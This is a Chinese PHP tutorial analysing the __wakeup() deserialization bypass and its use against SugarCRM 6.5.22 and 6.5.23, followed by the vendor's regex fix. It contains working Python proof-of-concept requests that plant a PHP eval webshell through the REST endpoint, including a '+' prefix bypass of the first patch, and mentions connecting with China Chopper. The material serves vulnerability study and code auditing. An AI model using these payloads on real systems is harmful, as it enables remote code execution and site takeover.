当前位置:首页 > PHP教程 > php高级应用 > 列表

php __wakeup()函数漏洞以及实际漏洞分析

发布:smiling 来源: PHP粉丝网  添加日期:2018-10-16 11:00:47 浏览: 评论:0 

__wakeup()函数用法

__wakeup()是用在反序列化操作中。unserialize()会检查存在一个__wakeup()方法。如果存在,则先会调用__wakeup()方法。

  1. <?php 
  2. class A{ 
  3.  function __wakeup(){ 
  4.   echo 'Hello'
  5.  }     
  6. $c = new A(); 
  7. $d=unserialize('O:1:"A":0:{}'); 
  8. ?> 

最后页面输出了Hello。在反序列化的时候存在__wakeup()函数,所以最后就会输出Hello

__wakeup()函数漏洞说明

  1. <?php   
  2. class Student{   
  3.     public $full_name = 'zhangsan'
  4.     public $score = 150; 
  5.     public $grades = array(); 
  6.  
  7.     function __wakeup() { 
  8.         echo "__wakeup is invoked"
  9.     } 
  10.  
  11. $s = new Student(); 
  12. var_dump(serialize($s)); 
  13. ?> 

最后页面上输出的就是Student对象的一个序列化输出,O:7:"Student":3:{s:9:"full_name";s:8:"zhangsan";s:5:"score";i:150;s:6:"grades";a:0:{}}。其中在Stuedent类后面有一个数字3,整个3表示的就是Student类存在3个属性。

__wakeup()漏洞就是与整个属性个数值有关。当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行。

当我们将上述的序列化的字符串中的对象属性修改为5,变为

O:7:"Student":5:{s:9:"full_name";s:8:"zhangsan";s:5:"score";i:150;s:6:"grades";a:0:{}}。

最后执行运行的代码如下:

  1. class Student{   
  2.     public $full_name = 'zhangsan'
  3.     public $score = 150; 
  4.     public $grades = array(); 
  5.  
  6.     function __wakeup() { 
  7.         echo "__wakeup is invoked"
  8.     }     
  9.  function __destruct() { 
  10.         var_dump($this); 
  11.     } 
  12.  
  13. $s = new Student(); 
  14. $stu = unserialize('O:7:"Student":5:{s:9:"full_name";s:8:"zhangsan";s:5:"score";i:150;s:6:"grades";a:0:{}}'); 

可以看到这样就成功地绕过了__wakeup()函数。

案例:

SugarCms存在一个很经典的__wakup()函数绕过的漏洞,网上也有分析文章。但是我发现网上的文章都是针对于6.5.23版本的,我后来有研究了6.5.22的版本。从这个版本的迭代中,可以看到程序员的防御思维,很值得我们研究和学习。由于在分析的过程中会按照代码审计的思路,会对其中重要的函数都会进行跟踪,所以整个分析看起来会比较的复杂和??拢??庹?霾街瓒际腔乖?舜?肷蠹浦械牟街琛?br /> 我们先从6.5.22版本开始分析。

找到反序列化语句:

在service/core/REST/SugarRestSerialize.php中的SugarRestSerialize类中的server()方法代码如下:

  1. function serve(){ 
  2.  $GLOBALS['log']->info('Begin: SugarRestSerialize->serve'); 
  3.  $data = !emptyempty($_REQUEST['rest_data'])? $_REQUEST['rest_data']: ''
  4.  if(emptyempty($_REQUEST['method']) || !method_exists($this->implementation, $_REQUEST['method'])){ 
  5.   $er = new SoapError(); 
  6.   $er->set_error('invalid_call'); 
  7.   $this->fault($er); 
  8.  }else
  9.   $method = $_REQUEST['method']; 
  10.   $data = unserialize(from_html($data)); 
  11.   if(!is_array($data))$data = array($data); 
  12.   $GLOBALS['log']->info('End: SugarRestSerialize->serve'); 
  13.   return call_user_func_array(array$this->implementation, $method),$data); 
  14.  } // else 
  15. // fn 

其中存在$data = unserialize(from_html($data))这样的序列化语句,而且$data是由$data = !empty($_REQUEST['rest_data'])? $_REQUEST['rest_data']: ''得到的,是我们可控的。那么就说明我们是可以控制反序列化的内容的。

寻找利用点

在找到了序列化语句之后,我们需要找到在哪些对象中可以利用这个反序列化语句。

在include/SugarCache/SugarCacheFile.php中的存在SugarCacheFile类以及__destruct()方法和__wakeup()方法。

  1. public function __destruct() 
  2.     parent::__destruct(); 
  3.  
  4.     if ( $this->_cacheChanged ) 
  5.         sugar_file_put_contents(sugar_cached($this->_cacheFileName), serialize($this->_localStore)); 
  6.  
  7. /** 
  8.  * This is needed to prevent unserialize vulnerability 
  9.  */ 
  10. public function __wakeup() 
  11.     // clean all properties 
  12.     foreach(get_object_vars($thisas $k => $v) { 
  13.         $this->$k = null; 
  14.     } 
  15.     throw new Exception("Not a serializable object"); 

我们发现,__wakeup()会将传入的对象的所有属性全部清空,__destruct()则主要调用sugar_file_put_contents()函数将serialize($this->_localStore)写入文件。

跟进sugar_file_put_contents(),在include/utils/sugar_file_utils.php中,

  1. function sugar_file_put_contents($filename$data$flags=null, $context=null){ 
  2.  //check to see if the file exists, if not then use touch to create it. 
  3.  if(!file_exists($filename)){ 
  4.   sugar_touch($filename); 
  5.  } 
  6.  
  7.  if ( !is_writable($filename) ) { 
  8.      $GLOBALS['log']->error("File $filename cannot be written to"); 
  9.      return false; 
  10.  } 
  11.  
  12.  if(emptyempty($flags)) { 
  13.   return file_put_contents($filename$data); 
  14.  } elseif(emptyempty($context)) { 
  15.   return file_put_contents($filename$data$flags); 
  16.  } else
  17.   return file_put_contents($filename$data$flags$context); 
  18.  } 

我们发现sugar_file_put_contents()函数并没有对文件进行限制,而SugarCacheFile类调用的__destruct中,$data的值就是serialize($this->_localStore)。所以我们只需要出入一个SugarCacheFile类的对象并设置其属性,这样我们就可以写入一个文件或者是一句话木马。

但是由于在SugarCacheFile中存在__wakeup()函数会将对象的所有属性全部清空,所以我们必须要绕过这个函数,那么就需要利用__wakeup()的漏洞了。

利用

通过上面的分析,我们可以总结出我们的数据整个的传输流程:

$_REQUEST['rest_data']->unserialize(from_html($data))-> __destruct()->sugar_file_put_contents->一句话木马

在确定了数据传输流程之后,就需要找到一个这样的环境或者是文件。这个文件调用了SugarRestSerialize.php的serve()方法,并且include文件SugarCacheFile.php文件。

一下就是简要的分析过程。

在service/v4/rest.php

  1. chdir('../..'); 
  2. require_once('SugarWebServiceImplv4.php'); 
  3. $webservice_class = 'SugarRestService'
  4. $webservice_path = 'service/core/SugarRestService.php'
  5. $webservice_impl_class = 'SugarWebServiceImplv4'
  6. $registry_class = 'registry'
  7. $location = '/service/v4/rest.php'
  8. $registry_path = 'service/v4/registry.php'
  9. require_once('service/core/webservice.php'); 

我们发现$webservice_class定义为SugarRestService。

跟踪其中的service/core/webservice.php

  1. ob_start(); 
  2. chdir(dirname(__FILE__).'/../../'); 
  3. require('include/entryPoint.php'); 
  4. require_once('soap/SoapError.php'); 
  5. require_once('SoapHelperWebService.php'); 
  6. require_once('SugarRestUtils.php'); 
  7. require_once($webservice_path); 
  8. require_once($registry_path); 
  9. if(isset($webservice_impl_class_path)) 
  10.     require_once($webservice_impl_class_path); 
  11. $url = $GLOBALS['sugar_config']['site_url'].$location
  12. $service = new $webservice_class($url); 
  13. $service->registerClass($registry_class); 
  14. $service->register(); 
  15. $service->registerImplClass($webservice_impl_class); 
  16. //phpfensi.com 
  17. // set the service object in the global scope so that any error, if happens, can be set on this object 
  18. global $service_object
  19. $service_object = $service
  20.  
  21. $service->serve(); 

其中的关键代码部分是:

$service = new $webservice_class($url);

其中的$webservice_class就是在service/v4/rest.php中定义的,为SugarRestService。

跟踪service/core/SugarRestService.php,发现

在57行的_getTypeName()函数中有:

  1. protected function _getTypeName($name
  2.  if(emptyempty($name)) return 'SugarRest'
  3.  
  4.  $name = clean_string($name'ALPHANUM'); 
  5.  $type = ''
  6.  switch(strtolower($name)) { 
  7.   case 'json'
  8.    $type = 'JSON'
  9.    break
  10.   case 'rss'
  11.    $type = 'RSS'
  12.    break
  13.   case 'serialize'
  14.    $type = 'Serialize'
  15.    break
  16.  } 
  17.  $classname = "SugarRest$type"
  18.  if(!file_exists('service/core/REST/' . $classname . '.php')) { 
  19.   return 'SugarRest'
  20.  } 
  21.  return $classname
  22. function __construct($url){ 
  23.  $GLOBALS['log']->info('Begin: SugarRestService->__construct'); 
  24.  $this->restURL = $url
  25.  
  26.  $this->responseClass = $this->_getTypeName(@$_REQUEST['response_type']); 
  27.  $this->serverClass = $this->_getTypeName(@$_REQUEST['input_type']); 
  28.  $GLOBALS['log']->info('SugarRestService->__construct serverclass = ' . $this->serverClass); 
  29.  require_once('service/core/REST/'$this->serverClass . '.php'); 
  30.  $GLOBALS['log']->info('End: SugarRestService->__construct'); 
  31. // ctor 

当传入的参数为Serialize,最后就会返回SugarRestSerialize字符串,最后就会在构造函数中构造出SugarRestSerialize类。

在86行的构造函数serve()中有:

  1. function serve(){ 
  2.  $GLOBALS['log']->info('Begin: SugarRestService->serve'); 
  3.  require_once('service/core/REST/'$this->responseClass . '.php'); 
  4.  $response  = $this->responseClass; 
  5.  
  6.  $responseServer = new $response($this->implementation); 
  7.  $this->server->faultServer = $responseServer
  8.  $responseServer->faultServer = $responseServer
  9.  $responseServer->generateResponse($this->server->serve()); 
  10.  $GLOBALS['log']->info('End: SugarRestService->serve'); 
  11. // fn 

在serve()函数中就会执行在__construct构造出来的SugarRestSerialize类了。

最后我们就要正在在webservice.php中引用了SugarCacheFile.php文件。

在webservice.php使用get_included_files()函数来进行得到所引用的所有的文件,最后发现引入了SugarCache.php,而SugarCache.php引入了SugarCacheFile.php,那么最后就相当于webservice.php引入了SugarCacheFile.php。

分析到这里,那么webservice.php就满足了上面所说的

这个文件调用了SugarRestSerialize.php的serve()方法,并且include文件SugarCacheFile.php文件。

那个要求了。

其中最关键的地方就是序列话语句的构造。

我们在本地运行如下的代码:

  1. <?php 
  2.  
  3. class SugarCacheFile 
  4.     protected $_cacheFileName = '../custom/1.php'
  5.  
  6.     protected $_localStore = array("<?php eval(\$_POST['bdw']);?>"); 
  7.  
  8.     protected $_cacheChanged = true; 
  9. $scf = new SugarCacheFile(); 
  10. var_dump(serialize($scf)); 
  11. ?> 

最后页面输出的结果是:

O:14:"SugarCacheFile":3:{s:17:"�*�_cacheFileName";s:15:"../custom/1.php";s:14:"�*�_localStore";a:1:{i:0;s:28:"<?php eval($_POST['bdw']);?>";}s:16:"�*�_cacheChanged";b:1;}

为什么使用var_dump的时候会出现无法显示的字符?这个字符就是\x0,即在php中的chr(0)字符。这个字符在页面上是无法显示的。出现这个字符的原因是和PHP的序列化的实现机制有关,这次就不做说明了。所以实际上的,序列化之后的结果应该是:

O:14:"SugarCacheFile":3:{s:17:"\x0*\x0_cacheFileName";s:15:"../custom/1.php";s:14:"\x0*\x0_localStore";a:1:{i:0;s:26:"<?php eval($_POST['1']);?>";}s:16:"\x0*\x0_cacheChanged";b:1;}

其中的\x0并不是\x、x、0三个字符,而是chr(0)一个字符。

得到序列化需要的字符串之后,那需要进行提交最后的PoC。

Poc Demo如下:

  1. import requests 
  2.  
  3. url = "http://localhost/sugar/service/v4/rest.php" 
  4. data = { 
  5.     'method':'login'
  6.     'input_type':'Serialize'
  7.     'rest_data':'O:14:"SugarCacheFile":4:{S:17:"\\00*\\00_cacheFileName";S:15:"../custom/1.php";S:14:"\\00*\\00_localStore";a:1:{i:0;S:26:"<?php eval($_POST[\'1\']);?>";}S:16:"\\00*\\00_cacheChanged";b:1;}' 

requests.post(url,data=data)

在上述的payload中有几点需要注意的问题,首先要修改掉序列化中的属性值来绕过__wakeup()函数,其次在Python中,chr(0)的表示方法是\\00。

最后就会在custom目录下得到1.php,木马的内容就是a:1:{i:0;s:26:"<?php eval($_POST['1']);?>";}

最后使用中国菜刀就可以顺利连上木马。

自此漏洞就基本分析完毕。

5.6.23版本

在22版本中,serve()方法是直接使用的unserialize()方法来进行的序列化,$data = unserialize(from_html($data))。

在24中的代码为:

  1. function serve(){ 
  2.  $GLOBALS['log']->info('Begin: SugarRestSerialize->serve'); 
  3.  $data = !emptyempty($_REQUEST['rest_data'])? $_REQUEST['rest_data']: ''
  4.  if(emptyempty($_REQUEST['method']) || !method_exists($this->implementation, $_REQUEST['method'])){ 
  5.   $er = new SoapError(); 
  6.   $er->set_error('invalid_call'); 
  7.   $this->fault($er); 
  8.  }else
  9.   $method = $_REQUEST['method']; 
  10.   $data = sugar_unserialize(from_html($data)); 
  11.   if(!is_array($data))$data = array($data); 
  12.   $GLOBALS['log']->info('End: SugarRestSerialize->serve'); 
  13.   return call_user_func_array(array$this->implementation, $method),$data); 
  14.  } // else 
  15. // fn 

其中将$data = unserialize(from_html($data))变为了$data = sugar_unserialize(from_html($data));。

跟踪sugar_unserialize()方法,在include/utils.php类有sugar_unserialize方法,

  1. function sugar_unserialize($value
  2.     preg_match('/[oc]:\d+:/i'$value$matches); 
  3.  
  4.     if (count($matches)) { 
  5.         return false; 
  6.     } 
  7.  
  8.     return unserialize($value); 

可以看对序列化的字符串进行了过滤,其实主要过滤的就是禁止Object类型被反序列化。虽然这样看起是没有问题的,但是由于PHP的一个BUG,导致仍然可以被绕过。只需要在对象长度前添加一个+号,即o:14->o:+14,这样就可以绕过正则匹配。关于这个BUG的具体分析,可以参见php反序列unserialize的一个小特性。

最后的PoC就是:

  1. import requests 
  2.  
  3. url = "http://localhost/sugar/service/v4/rest.php" 
  4. data = { 
  5.     'method':'login'
  6.     'input_type':'Serialize'
  7.     'rest_data':'O:+14:"SugarCacheFile":4:{S:17:"\\00*\\00_cacheFileName";S:15:"../custom/1.php";S:14:"\\00*\\00_localStore";a:1:{i:0;S:26:"<?php eval($_POST[\'1\']);?>";}S:16:"\\00*\\00_cacheChanged";b:1;}' 
  8.  
  9. requests.post(url,data=data) 

修复:这个漏洞是知道5.6.24版本才进行修复的,修复的方式也是十分的简单。

在这个版本中,上述的PoC已经不能够使用了。以下是修复代码。

在include/utils.php类有sugar_unserialize方法,

  1. function sugar_unserialize($value
  2.     preg_match('/[oc]:[^:]*\d+:/i'$value$matches); 
  3.  
  4.     if (count($matches)) { 
  5.         return false; 
  6.     } 
  7.  
  8.     return unserialize($value); 

可以看到,正则表达式已经变为/[oc]:[^:]*\d+:/i,那么通过+好来进行绕过的方式已经不适用了,这样就修复了这个漏洞了。

总结:在我本地执行的,其中有一个非常关键的地方在于,需要将payload中的序列化字符串中的s改为S,否则同样无法执行成功。当然我也和别人讨论一下,有的人大小写都可以,有的人一定要用大写。

可以看到最后的方法就是使用正则表达式/[oc]:[^:]*\d+:/i来禁止反序列化Object对象,但是序列化本质的作用就是传输对象数据,如果是其他的数据其实就使用传输了,所以不知道在SugarCRM中禁止传输Object对象却允许传输其他类型的数据有何意义?

最后还要感谢Bendwang的指点,解答了我的很多问题。

Tags: __wakeup() php函数漏洞

分享到: